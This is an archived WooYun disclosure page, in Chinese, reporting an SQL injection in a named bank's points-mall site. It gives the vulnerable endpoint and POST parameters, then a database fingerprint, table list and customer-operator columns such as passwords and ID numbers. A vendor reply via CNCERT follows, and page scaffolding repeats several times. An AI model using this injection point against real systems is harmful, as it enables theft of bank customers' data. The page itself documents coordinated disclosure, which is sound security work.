某银行商城存在SQL注入漏洞（涉敏感信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091074

漏洞标题：某银行商城存在SQL注入漏洞（涉敏感信息）

漏洞作者：袋鼠妈妈

提交时间：2015-01-10 22:50

修复时间：2015-02-24 22:52

公开时间：2015-02-24 22:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-10：细节已通知厂商并且等待厂商处理中
2015-01-15：厂商已经确认，细节仅向厂商公开
2015-01-25：细节向核心白帽子及相关领域专家公开
2015-02-04：细节向普通白帽子公开
2015-02-14：细节向实习白帽子公开
2015-02-24：细节向公众公开

简要描述：

某银行商城存在SQL注入漏洞,未深入,目测包含卡号，余额，身份证，流水号，管理员帐号密码等

详细说明：

桂林银行.积分商城:

https://ebank.guilinbank.com.cn/jfyMall/default.do

在搜索栏位置POST:

https://ebank.guilinbank.com.cn/jfyMall/goods/goodsSortlist.do (POST)
searchtype=0&serachType2=0&searchvalue=123

web server operating system: Windows
web application technology: JSP, Apache 2.2.15
back-end DBMS: Oracle
Database: JFY
[16 tables]
+-----------------+
| AV_POINTS_TOTAL |
| BANK_VO_BOOK    |
| BANK_VO_CARD    |
| BANK_VO_CARDAC  |
| BANK_VO_CERT    |
| BANK_VO_VOUCARD |
| CLEARINGLIST    |
| CONTACTINFO     |
| CUSTCLEARING    |
| CUSTGROUP       |
| CUSTINFO        |
| CUSTOMERS       |
| CUSTOPER        |
| HOSTACCMAST     |
| MYCOUPON        |
| UCARDTRANHIST   |
+-----------------+

web server operating system: Windows
web application technology: JSP, Apache 2.2.15
back-end DBMS: Oracle
Database: JFY
Table: CUSTOPER
[15 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| CERTNO        | VARCHAR2 |
| CUSTID        | NUMBER   |
| ERRLOGINCOUNT | NUMBER   |
| LASTLOGINIP   | VARCHAR2 |
| LASTLOGINTIME | VARCHAR2 |
| LOGIN_NUM     | NUMBER   |
| LOGINNAME     | VARCHAR2 |
| MOBILENO      | VARCHAR2 |
| OPERID        | NUMBER   |
| OPERNAME      | VARCHAR2 |
| OPERTYPE      | VARCHAR2 |
| PASSWORD      | VARCHAR2 |
| ROLEID        | NUMBER   |
| STATUS        | VARCHAR2 |
| STOREID       | NUMBER   |
+---------------+----------+

漏洞证明：

没敢深入，所以也没弄帐号进行登录...,.
只select rownum<3 。

修复方案：

版权声明：转载请注明来源袋鼠妈妈@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-01-15 08:32

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给广西分中心,由其后续协调网站管理单位处置.

漏洞评价：

2015-01-10 22:51 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

我擦。。。
2015-01-11 11:52 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云，知恩不忘，其实我一直都在乌云默...)

天天秒银行的人

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091074

漏洞标题：某银行商城存在SQL注入漏洞（涉敏感信息）

相关厂商：CNCERT

漏洞作者：袋鼠妈妈

提交时间：2015-01-10 22:50

修复时间：2015-02-24 22:52

公开时间：2015-02-24 22:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源袋鼠妈妈@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091074

漏洞标题：某银行商城存在SQL注入漏洞（涉敏感信息）

相关厂商：CNCERT

漏洞作者： 袋鼠妈妈

提交时间：2015-01-10 22:50

修复时间：2015-02-24 22:52

公开时间：2015-02-24 22:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-091074"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 袋鼠妈妈@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：袋鼠妈妈

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源袋鼠妈妈@乌云